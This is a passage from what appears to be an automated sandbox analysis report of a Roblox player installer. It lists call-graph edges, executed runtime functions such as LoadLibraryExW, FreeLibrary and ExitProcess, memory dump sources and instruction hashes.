1535->1536 1537 125caa6 1536->1537 1538 125ca2e LoadLibraryExW 1536->1538 1542 125ca7c LoadLibraryExW 1536->1542 1537->1532 1537->1533 1539 125caad 1538->1539 1540 125ca49 GetLastError 1538->1540 1539->1537 1541 125cabf FreeLibrary 1539->1541 1540->1536 1541->1537 1542->1536 1542->1539 1549 126261a 1543->1549 1560 125a316 GetLastError 1546->1560 1548 123e677 1548->1496 1550 1262626 ___free_lconv_mon 1549->1550 1555 1254802 EnterCriticalSection 1550->1555 1552 1262631 1556 126266d 1552->1556 1555->1552 1559 125484a LeaveCriticalSection 1556->1559 1558 12625f8 1558->1498 1559->1558 1561 125a332 1560->1561 1562 125a32c 1560->1562 1564 125cd5a ___free_lconv_mon 6 API calls 1561->1564 1581 125a336 SetLastError 1561->1581 1563 125cd1b ___free_lconv_mon 6 API calls 1562->1563 1563->1561 1565 125a34e 1564->1565 1567 125b99b ___free_lconv_mon 12 API calls 1565->1567 1565->1581 1568 125a363 1567->1568 1569 125a37c 1568->1569 1570 125a36b 1568->1570 1571 125cd5a ___free_lconv_mon 6 API calls 1569->1571 1572 125cd5a ___free_lconv_mon 6 API calls 1570->1572 1573 125a388 1571->1573 1574 125a379 1572->1574 1575 125a3a3 1573->1575 1576 125a38c 1573->1576 1578 125a4b0 ___free_lconv_mon 12 API calls 1574->1578 1579 1259ff3 ___free_lconv_mon 12 API calls 1575->1579 1577 125cd5a ___free_lconv_mon 6 API calls 1576->1577 1577->1574 1578->1581 1580 125a3ae 1579->1580 1582 125a4b0 ___free_lconv_mon 12 API calls 1580->1582 1581->1548 1582->1581 1584 1259e93 ___free_lconv_mon 1583->1584 1597 1254802 EnterCriticalSection 1584->1597 1586 1259e9d 1598 1259ecd 1586->1598 1589 1259f99 1590 1259fa5 ___free_lconv_mon 1589->1590 1602 1254802 EnterCriticalSection 1590->1602 1592 1259faf 1603 125a17a 1592->1603 1594 1259fc7 1607 1259fe7 1594->1607 1597->1586 1601 125484a LeaveCriticalSection 1598->1601 1600 1259ebb 1600->1589 1601->1600 1602->1592 1604 125a1b0 ___free_lconv_mon 1603->1604 1605 125a189 ___free_lconv_mon 1603->1605 1604->1594 1605->1604 1610 12634ce 1605->1610 1724 125484a LeaveCriticalSection 1607->1724 1609 1259fd5 1609->1460 1612 126354e 1610->1612 1613 12634e4 1610->1613 1614 125a4b0 ___free_lconv_mon 14 API calls 1612->1614 1636 126359c 1612->1636 1613->1612 1618 1263517 1613->1618 1620 125a4b0 ___free_lconv_mon 14 API calls 1613->1620 1615 1263570 1614->1615 1616 125a4b0 ___free_lconv_mon 14 API calls 1615->1616 1617 1263583 1616->1617 1622 125a4b0 ___free_lconv_mon 14 API calls 1617->1622 1623 125a4b0 ___free_lconv_mon 14 API calls 1618->1623 1637 1263539 1618->1637 1619 125a4b0 ___free_lconv_mon 14 API calls 1624 1263543 1619->1624 1626 126350c 1620->1626 1621 12635aa 1625 126360a 1621->1625 1632 125a4b0 14 API calls ___free_lconv_mon 1621->1632 1627 1263591 1622->1627 1628 126352e 1623->1628 1629 125a4b0 ___free_lconv_mon 14 API calls 1624->1629 1630 125a4b0 ___free_lconv_mon 14 API calls 1625->1630 1638 12627d2 1626->1638 1633 125a4b0 ___free_lconv_mon 14 API calls 1627->1633 1666 1262c86 1628->1666 1629->1612 1635 1263610 1630->1635 1632->1621 1633->1636 1635->1604 1678 126363f 1636->1678 1637->1619 1639 12627e3 1638->1639 1665 12628cc 1638->1665 1640 12627f4 1639->1640 1641 125a4b0 ___free_lconv_mon 14 API calls 1639->1641 1642 1262806 1640->1642 1643 125a4b0 ___free_lconv_mon 14 API calls 1640->1643 1641->1640 1644 1262818 1642->1644 1645 125a4b0 ___free_lconv_mon 14 API calls 1642->1645 1643->1642 1646 126282a 1644->1646 1647 125a4b0 ___free_lconv_mon 14 API calls 1644->1647 1645->1644 1648 125a4b0 ___free_lconv_mon 14 API calls 1646->1648 1650 126283c 1646->1650 1647->1646 1648->1650 1649 126284e 1652 1262860 1649->1652 1653 125a4b0 ___free_lconv_mon 14 API calls 1649->1653 1650->1649 1651 125a4b0 ___free_lconv_mon 14 API calls 1650->1651 1651->1649 1654 1262872 1652->1654 1655 125a4b0 ___free_lconv_mon 14 API calls 1652->1655 1653->1652 1656 1262884 1654->1656 1657 125a4b0 ___free_lconv_mon 14 API calls 1654->1657 1655->1654 1658 1262896 1656->1658 1659 125a4b0 ___free_lconv_mon 14 API calls 1656->1659 1657->1656 1660 12628a8 1658->1660 1661 125a4b0 ___free_lconv_mon 14 API calls 1658->1661 1659->1658 1662 12628ba 1660->1662 1663 125a4b0 ___free_lconv_mon 14 API calls 1660->1663 1661->1660 1664 125a4b0 ___free_lconv_mon 14 API calls 1662->1664 1662->1665 1663->1662 1664->1665 1665->1618 1667 1262c93 1666->1667 1677 1262ceb 1666->1677 1668 1262ca3 1667->1668 1669 125a4b0 ___free_lconv_mon 14 API calls 1667->1669 1670 1262cb5 1668->1670 1671 125a4b0 ___free_lconv_mon 14 API calls 1668->1671 1669->1668 1672 1262cc7 1670->1672 1673 125a4b0 ___free_lconv_mon 14 API calls 1670->1673 1671->1670 1674 125a4b0 ___free_lconv_mon 14 API calls 1672->1674 1675 1262cd9 1672->1675 1673->1672 1674->1675 1676 125a4b0 ___free_lconv_mon 14 API calls 1675->1676 1675->1677 1676->1677 1677->1637 1679 126364c 1678->1679 1683 126366b 1678->1683 1679->1683 1684 12631a1 1679->1684 1682 125a4b0 ___free_lconv_mon 14 API calls 1682->1683 1683->1621 1685 126327f 1684->1685 1686 12631b2 1684->1686 1685->1682 1720 1262f00 1686->1720 1689 1262f00 ___free_lconv_mon 14 API calls 1690 12631c5 1689->1690 1691 1262f00 ___free_lconv_mon 14 API calls 1690->1691 1692 12631d0 1691->1692 1693 1262f00 ___free_lconv_mon 14 API calls 1692->1693 1694 12631db 1693->1694 1695 1262f00 ___free_lconv_mon 14 API calls 1694->1695 1696 12631e9 1695->1696 1697 125a4b0 ___free_lconv_mon 14 API calls 1696->1697 1698 12631f4 1697->1698 1699 125a4b0 ___free_lconv_mon 14 API calls 1698->1699 1700 12631ff 1699->1700 1701 125a4b0 ___free_lconv_mon 14 API calls 1700->1701 1702 126320a 1701->1702 1703 1262f00 ___free_lconv_mon 14 API calls 1702->1703 1704 1263218 1703->1704 1705 1262f00 ___free_lconv_mon 14 API calls 1704->1705 1706 1263226 1705->1706 1707 1262f00 ___free_lconv_mon 14 API calls 1706->1707 1708 1263237 1707->1708 1709 1262f00 ___free_lconv_mon 14 API calls 1708->1709 1710 1263245 1709->1710 1711 1262f00 ___free_lconv_mon 14 API calls 1710->1711 1712 1263253 1711->1712 1713 125a4b0 ___free_lconv_mon 14 API calls 1712->1713 1714 126325e 1713->1714 1715 125a4b0 ___free_lconv_mon 14 API calls 1714->1715 1716 1263269 1715->1716 1717 125a4b0 ___free_lconv_mon 14 API calls 1716->1717 1718 1263274 1717->1718 1719 125a4b0 ___free_lconv_mon 14 API calls 1718->1719 1719->1685 1723 1262f12 1720->1723 1721 1262f21 1721->1689 1722 125a4b0 ___free_lconv_mon 14 API calls 1722->1723 1723->1721 1723->1722 1724->1609 1779 12537b8 1725->1779 1728 12539c5 1729 12539d1 ___free_lconv_mon 1728->1729 1730 125a316 ___free_lconv_mon 14 API calls 1729->1730 1733 12539fe 1729->1733 1736 12539f8 1729->1736 1730->1736 1731 1253a45 1732 123e672 ___free_lconv_mon 14 API calls 1731->1732 1734 1253a4a 1732->1734 1735 1253a71 1733->1735 1800 1254802 EnterCriticalSection 1733->1800 1797 123e574 1734->1797 1740 1253ba4 1735->1740 1741 1253ab3 1735->1741 1750 1253ae2 1735->1750 1736->1731 1736->1733 1758 1253a2f 1736->1758 1743 1253baf 1740->1743 1805 125484a LeaveCriticalSection 1740->1805 1746 125a1c5 43 API calls 1741->1746 1741->1750 1745 125447d 23 API calls 1743->1745 1755 1253bb7 ___free_lconv_mon 1745->1755 1748 1253ad7 1746->1748 1747 125a1c5 43 API calls 1751 1253b37 1747->1751 1749 125a1c5 43 API calls 1748->1749 1749->1750 1801 1253b51 1750->1801 1757 125a1c5 43 API calls 1751->1757 1751->1758 1752 1253c9e 1806 1254802 EnterCriticalSection 1752->1806 1755->1752 1760 1253c09 1755->1760 1767 1253c18 1755->1767 1756 1253cb2 1759 1253cc9 SetConsoleCtrlHandler 1756->1759 1764 1253cda ___free_lconv_mon 1756->1764 1757->1758 1758->1519 1761 1253ce3 GetLastError 1759->1761 1759->1764 1762 125a316 ___free_lconv_mon 14 API calls 1760->1762 1760->1767 1807 123e65f 1761->1807 1765 1253c23 1762->1765 1810 1253d55 1764->1810 1765->1767 1790 125a4ea 1765->1790 1769 1253c69 1767->1769 1813 125394f 1767->1813 1769->1519 1771 123e394 1770->1771 1772 123e3c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1771->1772 1775 123e491 1772->1775 1773 1232f6a _ValidateLocalCookies 5 API calls 1774 123e4af 1773->1774 1774->1521 1775->1773 1882 12542e4 1776->1882 1780 12537c4 ___free_lconv_mon 1779->1780 1785 1254802 EnterCriticalSection 1780->1785 1782 12537d2 1786 1253810 1782->1786 1785->1782 1789 125484a LeaveCriticalSection 1786->1789 1788 1244631 1788->1519 1788->1728 1789->1788 1791 125a528 1790->1791 1792 125a4f8 ___free_lconv_mon 1790->1792 1793 123e672 ___free_lconv_mon 14 API calls 1791->1793 1792->1791 1794 125a513 RtlAllocateHeap 1792->1794 1796 12625ed ___free_lconv_mon 2 API calls 1792->1796 1795 125a526 1793->1795 1794->1792 1794->1795 1795->1767 1796->1792 1817 123e4c0 1797->1817 1800->1735 1802 1253b57 1801->1802 1803 1253b28 1801->1803 1880 125484a LeaveCriticalSection 1802->1880 1803->1747 1803->1751 1803->1758 1805->1743 1806->1756 1808 125a316 ___free_lconv_mon 14 API calls 1807->1808 1809 123e664 1808->1809 1809->1764 1881 125484a LeaveCriticalSection 1810->1881 1812 1253d5c 1812->1767 1814 125395c 1813->1814 1816 1253975 1813->1816 1815 123e672 ___free_lconv_mon 14 API calls 1814->1815 1814->1816 1815->1816 1816->1769 1818 123e4d2 1817->1818 1823 123e4f7 1818->1823 1820 123e4ea 1834 123e2b0 1820->1834 1824 123e50e 1823->1824 1825 123e507 1823->1825 1830 123e51c 1824->1830 1844 123e2ec 1824->1844 1840 123e315 GetLastError 1825->1840 1828 123e543 1828->1830 1847 123e5a1 IsProcessorFeaturePresent 1828->1847 1830->1820 1831 123e573 1832 123e4c0 45 API calls 1831->1832 1833 123e580 1832->1833 1833->1820 1835 123e2bc 1834->1835 1836 123e2d3 1835->1836 1873 123e35b 1835->1873 1837 123e2e6 1836->1837 1839 123e35b 45 API calls 1836->1839 1837->1758 1839->1837 1841 123e32e 1840->1841 1851 125a3c7 1841->1851 1845 123e310 1844->1845 1846 123e2f7 GetLastError SetLastError 1844->1846 1845->1828 1846->1828 1848 123e5ad 1847->1848 1849 123e378 8 API calls 1848->1849 1850 123e5c2 GetCurrentProcess TerminateProcess 1849->1850 1850->1831 1852 125a3e0 1851->1852 1853 125a3da 1851->1853 1855 125cd5a ___free_lconv_mon 6 API calls 1852->1855 1872 123e346 SetLastError 1852->1872 1854 125cd1b ___free_lconv_mon 6 API calls 1853->1854 1854->1852 1856 125a3fa 1855->1856 1857 125b99b ___free_lconv_mon 14 API calls 1856->1857 1856->1872 1858 125a40a 1857->1858 1859 125a427 1858->1859 1860 125a412 1858->1860 1861 125cd5a ___free_lconv_mon 6 API calls 1859->1861 1862 125cd5a ___free_lconv_mon 6 API calls 1860->1862 1863 125a433 1861->1863 1864 125a41e 1862->1864 1865 125a437 1863->1865 1866 125a446 1863->1866 1869 125a4b0 ___free_lconv_mon 14 API calls 1864->1869 1867 125cd5a ___free_lconv_mon 6 API calls 1865->1867 1868 1259ff3 ___free_lconv_mon 14 API calls 1866->1868 1867->1864 1870 125a451 1868->1870 1869->1872 1871 125a4b0 ___free_lconv_mon 14 API calls 1870->1871 1871->1872 1872->1824 1874 123e365 1873->1874 1875 123e36e 1873->1875 1876 123e315 16 API calls 1874->1876 1875->1836 1877 123e36a 1876->1877 1877->1875 1878 124462c 45 API calls 1877->1878 1879 123e377 1878->1879 1880->1803 1881->1812 1883 1254311 1882->1883 1884 1254323 1882->1884 1909 1233398 GetModuleHandleW 1883->1909 1894 12541ac 1884->1894 1888 124466f GetSystemTimeAsFileTime 1888->1527 1892 1254375 1895 12541b8 ___free_lconv_mon 1894->1895 1917 1254802 EnterCriticalSection 1895->1917 1897 12541c2 1918 12541f9 1897->1918 1899 12541cf 1922 12541ed 1899->1922 1902 125437b 1947 12543ac 1902->1947 1905 1254399 1907 12543ce 3 API calls 1905->1907 1906 1254389 GetCurrentProcess TerminateProcess 1906->1905 1908 12543a1 ExitProcess 1907->1908 1910 12333a4 1909->1910 1910->1884 1911 12543ce GetModuleHandleExW 1910->1911 1912 125440d GetProcAddress 1911->1912 1913 125442e 1911->1913 1912->1913 1914 1254421 1912->1914 1915 1254434 FreeLibrary 1913->1915 1916 1254322 1913->1916 1914->1913 1915->1916 1916->1884 1917->1897 1920 1254205 ___free_lconv_mon 1918->1920 1919 125426c 1919->1899 1920->1919 1925 1257a3b 1920->1925 1946 125484a LeaveCriticalSection 1922->1946 1924 12541db 1924->1888 1924->1902 1926 1257a47 __EH_prolog3 1925->1926 1929 1257793 1926->1929 1928 1257a6e 1928->1919 1930 125779f ___free_lconv_mon 1929->1930 1937 1254802 EnterCriticalSection 1930->1937 1932 12577ad 1938 125794b 1932->1938 1937->1932 1939 125796a 1938->1939 1940 12577ba 1938->1940 1939->1940 1941 125a4b0 ___free_lconv_mon 14 API calls 1939->1941 1942 12577e2 1940->1942 1941->1940 1945 125484a LeaveCriticalSection 1942->1945 1944 12577cb 1944->1928 1945->1944 1946->1924 1952 125d13c GetPEB 1947->1952 1950 12543b6 GetPEB 1951 1254385 1950->1951 1951->1905 1951->1906 1953 12543b1 1952->1953 1954 125d156 1952->1954 1953->1950 1953->1951 1956 125cb4d 1954->1956 1957 125caca ___free_lconv_mon 5 API calls 1956->1957 1958 125cb69 1957->1958 1958->1953 1960 125caca ___free_lconv_mon 5 API calls 1959->1960 1961 125cba9 1960->1961 1961->1480 1963 125a316 ___free_lconv_mon 14 API calls 1962->1963 1965 12444ff 1963->1965 1964 1244541 ExitThread 1965->1964 1966 1244518 1965->1966 1971 125d03e 1965->1971 1968 124452b 1966->1968 1969 1244524 CloseHandle 1966->1969 1968->1964 1970 1244537 FreeLibraryAndExitThread 1968->1970 1969->1968 1970->1964 1972 125caca ___free_lconv_mon 5 API calls 1971->1972 1973 125d057 1972->1973 1973->1966 1985 127d7fb 1986 1232f6a _ValidateLocalCookies 5 API calls 1985->1986 1987 127d80e 1986->1987 1988 125383b 1989 1253847 ___free_lconv_mon 1988->1989 1994 1254802 EnterCriticalSection 1989->1994 1991 1253856 1995 12538b6 1991->1995 1994->1991 1998 125484a LeaveCriticalSection 1995->1998 1997 12538a8 1998->1997

                                                                              Callgraph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Opacity -> Relevance
                                                                              • Disassembly available
                                                                              callgraph 0 Function_01253927 1 Function_01232820 82 Function_012334E2 1->82 2 Function_0124462C 31 Function_0125447D 2->31 33 Function_0123E378 2->33 44 Function_01232450 2->44 68 Function_01253980 2->68 102 Function_012539C5 2->102 3 Function_01258531 4 Function_0126363F 53 Function_012631A1 4->53 61 Function_0125A4B0 4->61 5 Function_0125D13C 37 Function_0125CB4D 5->37 6 Function_0125D03E 108 Function_0125CACA 6->108 7 Function_0124443F 12 Function_0125D003 7->12 20 Function_0124461E 7->20 38 Function_01256E4C 7->38 43 Function_01233450 7->43 99 Function_0125D0F8 7->99 101 Function_0125A1C5 7->101 8 Function_01257A3B 29 Function_01233175 8->29 72 Function_01257793 8->72 75 Function_01233198 8->75 9 Function_0123343D 10 Function_0125383B 13 Function_01254802 10->13 10->43 58 Function_012538B6 10->58 11 Function_01262F00 11->61 12->108 14 Function_01263616 15 Function_01236310 23 Function_01232F6A 15->23 16 Function_0125A316 22 Function_0125CD1B 16->22 50 Function_0125CD5A 16->50 16->61 78 Function_0125B99B 16->78 94 Function_01259FF3 16->94 17 Function_01253810 41 Function_0125484A 17->41 18 Function_0123E315 103 Function_0125A3C7 18->103 19 Function_0125381C 90 Function_012444F4 20->90 21 Function_0126261A 21->13 25 Function_0126266D 21->25 21->43 22->108 32 Function_01232F78 23->32 24 Function_0123E268 25->41 26 Function_0123E672 26->16 27 Function_01234270 28 Function_01263670 30 Function_0123E574 104 Function_0123E4C0 30->104 81 Function_012542E4 31->81 33->9 33->23 33->27 34 Function_0125437B 55 Function_012543AC 34->55 107 Function_012543CE 34->107 35 Function_0125A17A 47 Function_01263451 35->47 79 Function_01263699 35->79 105 Function_012634CE 35->105 36 Function_01243142 37->108 38->16 39 Function_0125394F 39->26 40 Function_0125794B 40->61 42 Function_01253D55 42->41 45 Function_01236350 45->15 56 Function_0126E1AA 45->56 60 Function_0123DFB0 45->60 71 Function_0123DF90 45->71 89 Function_012372EC 45->89 92 Function_0123DFF0 45->92 95 Function_0126DFF0 45->95 109 Function_0123DFD0 45->109 112 Function_012431DC 45->112 46 Function_01253B51 46->41 47->14 48 Function_0123E35B 48->2 48->18 49 Function_0123E65F 49->16 50->108 51 Function_0123E5A1 51->33 52 Function_0123DEA0 59 Function_012374B0 52->59 70 Function_01237490 52->70 53->11 53->61 54 Function_012541AC 54->13 54->43 85 Function_012541ED 54->85 97 Function_012541F9 54->97 55->5 57 Function_0123E2B0 57->48 58->41 60->70 61->26 111 Function_0123E5D5 61->111 62 Function_01259CB0 63 Function_0126E0B0 64 Function_0127EBBF 64->23 65 Function_012537B8 65->13 65->17 65->43 66 Function_01262C86 66->61 67 Function_01259E87 67->13 67->43 106 Function_01259ECD 67->106 68->65 69 Function_0125CB8D 69->108 72->13 72->40 72->43 84 Function_012577E2 72->84 73 Function_01233495 74 Function_0126DF90 76 Function_01233398 77 Function_01259F99 77->13 77->35 77->43 83 Function_01259FE7 77->83 78->26 78->62 86 Function_012625ED 78->86 79->28 80 Function_012538E5 81->34 81->54 81->76 81->107 82->73 83->41 84->41 85->41 86->21 87 Function_0125A4EA 87->26 87->62 87->86 88 Function_0123E2EC 90->6 90->16 91 Function_01233CF0 92->52 93 Function_0123E4F7 93->18 93->51 93->88 93->104 94->67 94->77 95->63 95->74 96 Function_0125C9FF 96->36 97->3 97->8 97->43 98 Function_0127D7FB 98->23 99->69 100 Function_00FD2120 101->2 101->22 101->50 101->61 101->78 101->94 102->0 102->13 102->16 102->19 102->26 102->30 102->31 102->39 102->41 102->42 102->43 102->46 102->49 102->80 102->87 102->91 102->101 103->22 103->50 103->61 103->78 103->94 104->24 104->57 104->93 105->4 105->61 105->66 110 Function_012627D2 105->110 106->41 108->19 108->96 110->61 112->61

                                                                              Executed Functions

                                                                              Function 0125D0F8 Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 254 125d0f8-125d108 255 125d137-125d13b 254->255 256 125d10a-125d11b GetPEB 254->256 257 125d11d-125d121 call 125cb8d 256->257 258 125d12e-125d135 256->258 260 125d126-125d129 257->260 258->255 260->258 261 125d12b-125d12d 260->261 261->258
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e5c1a1e5406207a1bb35c5ed04f1fed4ada7396c931dbc2c8d7af1cad82e206c
                                                                              • Instruction ID: 517382e097739c575eabdfc301a5ec3fa18c8aed81d48a75212c07f1878ac3df
                                                                              • Opcode Fuzzy Hash: e5c1a1e5406207a1bb35c5ed04f1fed4ada7396c931dbc2c8d7af1cad82e206c
                                                                              • Instruction Fuzzy Hash: 0DF03032A21328EFCB26CA9CC445B9973ADEB49B61F114056E9019B141D674DD00DBC0
                                                                              Function 0125C9FF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,5727C2D5,?,0125CB0C,?,?,?,00000000), ref: 0125CAC0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-$ext-ms-
                                                                              • API String ID: 3664257935-537541572
                                                                              • Opcode ID: 22b7838c21f4a342ac69e0b11452a9291777c1d23889ab4218dd8c9a6174c9c3
                                                                              • Instruction ID: 98f8477e13c1a205489c936d28edc7ef72c671bd23a7612f770f53e923bf4771
                                                                              • Opcode Fuzzy Hash: 22b7838c21f4a342ac69e0b11452a9291777c1d23889ab4218dd8c9a6174c9c3
                                                                              • Instruction Fuzzy Hash: 4E21EB71A11322ABD772DF24EC85A6A3F6CAB41770F140514FE16A7285E774E911C7D0
                                                                              Function 012444F4 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
